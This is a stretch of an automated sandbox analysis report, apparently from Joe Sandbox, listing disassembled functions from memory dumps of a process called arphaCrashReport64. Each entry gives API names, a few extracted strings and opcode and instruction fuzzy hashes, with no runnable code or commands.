                                            • Instruction ID: 52bdfb8b61c95fb61fb4fc26d73e38bc7c23e8374c952e64e599a482253db040
                                            • Opcode Fuzzy Hash: 2d48e3d70f214aa4afb2f177af8117296f37c19805a75fb751cec93a5421d43b
                                            • Instruction Fuzzy Hash: B2114236215FC8C6FBA69B11E4987A873ABF744B85F4A4025DB5F03399DF68C460C718
                                            Function 00007FFDFB8B28E4 Relevance: 6.0, APIs: 4, Instructions: 44COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CriticalDeleteSection$Freefree
                                            • String ID:
                                            • API String ID: 1250194111-0
                                            • Opcode ID: f097861ccf4a3776d8453d063f4597e8d310759331ef9ffebfc685100f43f8f9
                                            • Instruction ID: 0617a64913b6c65363f8a9b325e46093eac831a88147356c64cbf165d4886013
                                            • Opcode Fuzzy Hash: f097861ccf4a3776d8453d063f4597e8d310759331ef9ffebfc685100f43f8f9
                                            • Instruction Fuzzy Hash: 55118E32F2AA47C6EB148B21E4619683260FB84B55F5C8530D67E036F9CF2CE4518F80
                                            Function 0000024B6459303C Relevance: 6.0, APIs: 4, Instructions: 33threadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Thread$CurrentErrorExitLastUser_freefls
                                            • String ID:
                                            • API String ID: 2333339018-0
                                            • Opcode ID: 1d327169eee2f3b51d41e9c8fa1145ac288bfea310b6a99aceaecc2bb69ad073
                                            • Instruction ID: b8b843507112b2305d2869f6d122e5660139f5223a338ce23d03519303c33743
                                            • Opcode Fuzzy Hash: 1d327169eee2f3b51d41e9c8fa1145ac288bfea310b6a99aceaecc2bb69ad073
                                            • Instruction Fuzzy Hash: 7001CD28200FC885EF06ABB1940D39C22AEAB0EB84F064435CB5D4739FEF38C8948319
                                            Function 0000024B64582A50 Relevance: 6.0, APIs: 4, Instructions: 29synchronizationthreadCOMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: Create$CloseEventHandleObjectSingleThreadWait
                                            • String ID:
                                            • API String ID: 3360349984-0
                                            • Opcode ID: 7ec8991d8e7ba380ce2ba135d182d7ed855463916c5f2a3eec3c41204f7881e0
                                            • Instruction ID: 9efd930f02afcd219e59cda0fa49f5c4443293a6294259444d2ce9ac94efff01
                                            • Opcode Fuzzy Hash: 7ec8991d8e7ba380ce2ba135d182d7ed855463916c5f2a3eec3c41204f7881e0
                                            • Instruction Fuzzy Hash: 29F04932618E8083E715CF75B85865B77B6F3C5750F14922AFA9A42B68CF3CC0998A04
                                            Function 0000024B645963FC Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _amsg_exit_getptd$_lock
                                            • String ID:
                                            • API String ID: 3670291111-0
                                            • Opcode ID: e7941a96530e1c955f2a00232421d4091be33abcd81c70c340db9f77def0201e
                                            • Instruction ID: a96a62b3d5346f9a7b53cebca82d53fca6aff93917924990aa196443c6c07040
                                            • Opcode Fuzzy Hash: e7941a96530e1c955f2a00232421d4091be33abcd81c70c340db9f77def0201e
                                            • Instruction Fuzzy Hash: 19F090112119C4C5FF16EB9088A9BEC136BE745B44F5B1138DB1C073CACF18C844C718
                                            Function 0000024B645826D0 Relevance: 6.0, APIs: 4, Instructions: 24COMMON
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: CancelEventclosesocketsetsockopt
                                            • String ID:
                                            • API String ID: 852421847-0
                                            • Opcode ID: e40bbd37a51d8472f3c7ef4493497414e2ab08d8669d51031812fb7bf0656f87
                                            • Instruction ID: e10a559741177cae9ddac719056f0b72d1fcc4e06c95740606b355c329f288d9
                                            • Opcode Fuzzy Hash: e40bbd37a51d8472f3c7ef4493497414e2ab08d8669d51031812fb7bf0656f87
                                            • Instruction Fuzzy Hash: 28F01D36604A8197E7118F26E548259B371F789BA4F500326DFA943BE8CF79C4A9CB04
                                            Function 0000024B642B1A7C Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 209COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm$csm
                                            • API String ID: 3186804695-3733052814
                                            • Opcode ID: 5e3fd1bce8c838ab5e03e450a674cda2890a01e6717efc304ddca7fd09c103c4
                                            • Instruction ID: a9c7105dc60a66ea4abf7079e210b33d6c9abd19777050983ad587435fef76ec
                                            • Opcode Fuzzy Hash: 5e3fd1bce8c838ab5e03e450a674cda2890a01e6717efc304ddca7fd09c103c4
                                            • Instruction Fuzzy Hash: 00618030228E048BEFA69E1880897797BD4FB59359F79015DD489C329ED7B0D8C1CB8A
                                            Function 00007FFDFB8B8B44 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm$csm
                                            • API String ID: 3186804695-3733052814
                                            • Opcode ID: 52b3a9ad3180fc5ff03ffedfe7ad377a8c4b1ee4b0187de3abdf4d9ecab382fd
                                            • Instruction ID: a870fb707c8241113ddfa28668011a8e824e7ad2a8c9f670767ad1d896a1b21f
                                            • Opcode Fuzzy Hash: 52b3a9ad3180fc5ff03ffedfe7ad377a8c4b1ee4b0187de3abdf4d9ecab382fd
                                            • Instruction Fuzzy Hash: 1051776272A24386EBB49F359060B797690AB90B84F088135DA6D576E9CF3CE451CF81
                                            Function 0000024B645A20C4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 146COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _amsg_exit_getptd
                                            • String ID: csm$csm
                                            • API String ID: 4217099735-3733052814
                                            • Opcode ID: 5e3fd1bce8c838ab5e03e450a674cda2890a01e6717efc304ddca7fd09c103c4
                                            • Instruction ID: 915431c193ca3c005444ee2823eb27e3a90e812c99520043486d37162fe9a8dc
                                            • Opcode Fuzzy Hash: 5e3fd1bce8c838ab5e03e450a674cda2890a01e6717efc304ddca7fd09c103c4
                                            • Instruction Fuzzy Hash: 5051C232204A8086EB669F63904D7AD779AF741B88F064117EF5947BDDCB38C8D9CB09
                                            Function 0000024B6459D904 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 68COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _errno_getptd_invalid_parameter_noinfo
                                            • String ID: cmd.exe
                                            • API String ID: 2821341848-723907552
                                            • Opcode ID: 0266115e91bc52eaad2b33c98125c693a6f3df37ec7558ae37d65f5306a0b61e
                                            • Instruction ID: 2145dcf3d9452fc4c94934e1445a3fa7dde58ee28985fccb134451bed9b61888
                                            • Opcode Fuzzy Hash: 0266115e91bc52eaad2b33c98125c693a6f3df37ec7558ae37d65f5306a0b61e
                                            • Instruction Fuzzy Hash: 9E21F022614FC482F7638715945836EA7D6E3817E4F294111EBDA07ADFDB34C4498749
                                            Function 0000024B645A620B Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 58COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm$csm
                                            • API String ID: 3186804695-3733052814
                                            • Opcode ID: 242a815db8c3cdda7a2ffcfa41b3fee5aa8c22d82fb7f5c2ad884890cf7d0286
                                            • Instruction ID: a611a3160356bd91bb1e82a3023c0a24107771978bae78b8d93bf8cfb88ae97b
                                            • Opcode Fuzzy Hash: 242a815db8c3cdda7a2ffcfa41b3fee5aa8c22d82fb7f5c2ad884890cf7d0286
                                            • Instruction Fuzzy Hash: D531CB77100B44CAEB658F69C48439C3B7AF758B9DF462216EA8D0BB58C775C8D4C788
                                            Function 00007FFDFB8B9142 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904732729.00007FFDFB8B1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FFDFB8B0000, based on PE: true
                                            • Associated: 00000002.00000002.2904717310.00007FFDFB8B0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904754323.00007FFDFB8BA000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904773653.00007FFDFB8BE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                            • Associated: 00000002.00000002.2904794174.00007FFDFB8C1000.00000002.00000001.01000000.00000008.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_7ffdfb8b0000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm
                                            • API String ID: 3186804695-1018135373
                                            • Opcode ID: 5965f17aa3332b4e44b0aa65d61c54735a76f66c1f86e0f5987416d31bc3ed5d
                                            • Instruction ID: 8c385ec92773faefe87709d88d8df86c32e51ab645277d5bf3d3e723313fa01f
                                            • Opcode Fuzzy Hash: 5965f17aa3332b4e44b0aa65d61c54735a76f66c1f86e0f5987416d31bc3ed5d
                                            • Instruction Fuzzy Hash: C8018862B2A28385EB30AF31C864BBC2364EFD4755F458135C92D066EACF39D880DF81
                                            Function 0000024B645A630B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 37COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: _getptd
                                            • String ID: csm
                                            • API String ID: 3186804695-1018135373
                                            • Opcode ID: 26f1d399d85a811bd1aefae5e1e74d4b58932a37f709c1676df34e39b3a0f0b3
                                            • Instruction ID: 615771a573d962ef33fcc1532220b27384e05d46e608d17aa43b77d16badd086
                                            • Opcode Fuzzy Hash: 26f1d399d85a811bd1aefae5e1e74d4b58932a37f709c1676df34e39b3a0f0b3
                                            • Instruction Fuzzy Hash: B9015226140B81C9DB769F2584583AC33A9F755B59F5A1127CE9D0B68ACB31C9CAC308
                                            Function 0000024B6459FC18 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON
                                            Download Yara Rule
                                            APIs
                                            • std::exception::exception.LIBCMT ref: 0000024B6459FC36
                                              • Part of subcall function 0000024B6459581C: RaiseException.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000024B64593332), ref: 0000024B64595897
                                            • std::exception::exception.LIBCMT ref: 0000024B6459FC70
                                              • Part of subcall function 0000024B64593854: std::exception::operator=.LIBCMT ref: 0000024B64593870
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: std::exception::exception$ExceptionRaisestd::exception::operator=
                                            • String ID: regular expression error
                                            • API String ID: 958326869-2947193470
                                            • Opcode ID: ff8c2e4f42a0520cba126fe10ee74a09866bc8aa3b4b7254a67f0fb6c7d3fc4e
                                            • Instruction ID: a1b5d683092a336c11da5770b4a0ac6a9064e0c79c7bd5315cec9a7ba40afbd2
                                            • Opcode Fuzzy Hash: ff8c2e4f42a0520cba126fe10ee74a09866bc8aa3b4b7254a67f0fb6c7d3fc4e
                                            • Instruction Fuzzy Hash: DAF0DC32604F8AD2DB11DF60F588089B769F34C388F544412EB8C07B2DDB78C6A9CB44
                                            Function 0000024B6458F130 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: FileFindFirstFolderKnownPathwsprintf
                                            • String ID: %s%s
                                            • API String ID: 2506083511-3252725368
                                            • Opcode ID: cf0cb94e8e76bd572306bd30864732f376da17c4046eae9bd0e18817c63ecf81
                                            • Instruction ID: 3fc855c9283acfb2a74734f783a02b517586afc1dae4b6f49855a07705fc5706
                                            • Opcode Fuzzy Hash: cf0cb94e8e76bd572306bd30864732f376da17c4046eae9bd0e18817c63ecf81
                                            • Instruction Fuzzy Hash: 03014F22214EC181EA218B21FC997AA6366F788B88F455012EA8D47A1DDF3CC149CB08
                                            Function 0000024B642AD7B0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: __doserrno_errno
                                            • String ID: M
                                            • API String ID: 921712934-3664761504
                                            • Opcode ID: 55f1f2b5d4f88ce944560703f07ace5cba4083014a431a69087704bf253f0c3d
                                            • Instruction ID: 1983710eaf08072e93f3f51f66985bc4caacd7735cd5a494c2e6279f4c2f1ab3
                                            • Opcode Fuzzy Hash: 55f1f2b5d4f88ce944560703f07ace5cba4083014a431a69087704bf253f0c3d
                                            • Instruction Fuzzy Hash: 2EE0DFB221CA084EFB096F14E4073F837C0FB43330F91410AE5AA466C6DB7A804A4759
                                            Function 0000024B6459DDF8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 20COMMON
                                            Download Yara Rule
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: __doserrno_errno
                                            • String ID: M
                                            • API String ID: 921712934-3664761504
                                            • Opcode ID: 88e3740ee09343cd30c38a3a770d6118f1510097ede86d60084724bf1f3c4cd7
                                            • Instruction ID: 41b4fd13e4be5c7d261fb3dfe16e2d95e84459b8fa94036a08cdb6acae1a3b41
                                            • Opcode Fuzzy Hash: 88e3740ee09343cd30c38a3a770d6118f1510097ede86d60084724bf1f3c4cd7
                                            • Instruction Fuzzy Hash: 97E0127350098089F757AF74F84639D3A95A79533CF82C212AF6D0A6C6CB7C84C78B15
                                            Function 0000024B64295B08 Relevance: 5.1, APIs: 4, Instructions: 88COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904157690.0000024B64290000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64290000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64290000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$_errno
                                            • String ID:
                                            • API String ID: 2288870239-0
                                            • Opcode ID: b863403ab495316a5b6b17ca1e1e139bea759e5f61c69152686c6568255f01be
                                            • Instruction ID: 0b9fb46ae9abd8e15e515cbe5e9a9d4aaefa2cf7cc89bcec125fa7bf7d93a346
                                            • Opcode Fuzzy Hash: b863403ab495316a5b6b17ca1e1e139bea759e5f61c69152686c6568255f01be
                                            • Instruction Fuzzy Hash: 94213231224E0D9FDFA6EF1EC0A875573E5FB98310F6605699809C369ECF30E8868744
                                            Function 0000024B64586150 Relevance: 5.1, APIs: 4, Instructions: 54COMMONLIBRARYCODE
                                            Download Yara Rule
                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: free$ErrorFreeHeapLast_errno
                                            • String ID:
                                            • API String ID: 1012874770-0
                                            • Opcode ID: 49d45eedc48c0d8e1f115a64ee84916a85c82a77571192eddabdc062e6e56858
                                            • Instruction ID: e871d0d20576ab7a2f4213ea04877011ed6b67deb1ce2fea4539a41c7b0e93ae
                                            • Opcode Fuzzy Hash: 49d45eedc48c0d8e1f115a64ee84916a85c82a77571192eddabdc062e6e56858
                                            • Instruction Fuzzy Hash: 4F215E26211F8191EB17AF12E6583A9A36AFB58FC0F0D6822EF4E07B5FDF24D4518344
                                            Function 0000024B64592020 Relevance: 5.1, APIs: 4, Instructions: 52memoryCOMMON
                                            Download Yara Rule
                                            APIs
                                            • free.LIBCMT ref: 0000024B6459209A
                                            • VirtualFree.KERNEL32(?,?,00000000,0000024B64591EDE,?,?,?,0000024B6458E182), ref: 0000024B645920B5
                                            • GetProcessHeap.KERNEL32(?,?,00000000,0000024B64591EDE,?,?,?,0000024B6458E182), ref: 0000024B645920BB
                                            • HeapFree.KERNEL32(?,?,00000000,0000024B64591EDE,?,?,?,0000024B6458E182), ref: 0000024B645920C9
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.2904351852.0000024B64580000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000024B64580000, based on PE: true
                                            • Associated: 00000002.00000002.2904351852.0000024B645A8000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            • Associated: 00000002.00000002.2904351852.0000024B64861000.00000040.00001000.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_24b64580000_arphaCrashReport64.jbxd
                                            Similarity
                                            • API ID: FreeHeap$ProcessVirtualfree
                                            • String ID:
                                            • API String ID: 4282497734-0
                                            • Opcode ID: 3b9f99c55452a2da9007e377bfe996ac61a1e50bdcc6d0c570a87083eee3be1a
                                            • Instruction ID: a6332d5dee224ffe3e117e52748a1672a0fc301938bd4ec33b0dd160362e1a7a
                                            • Opcode Fuzzy Hash: 3b9f99c55452a2da9007e377bfe996ac61a1e50bdcc6d0c570a87083eee3be1a
                                            • Instruction Fuzzy Hash: 11115132611E9092EB56CF66D45835D63A6F784F84F065425EF4A53A5CCF34C892C744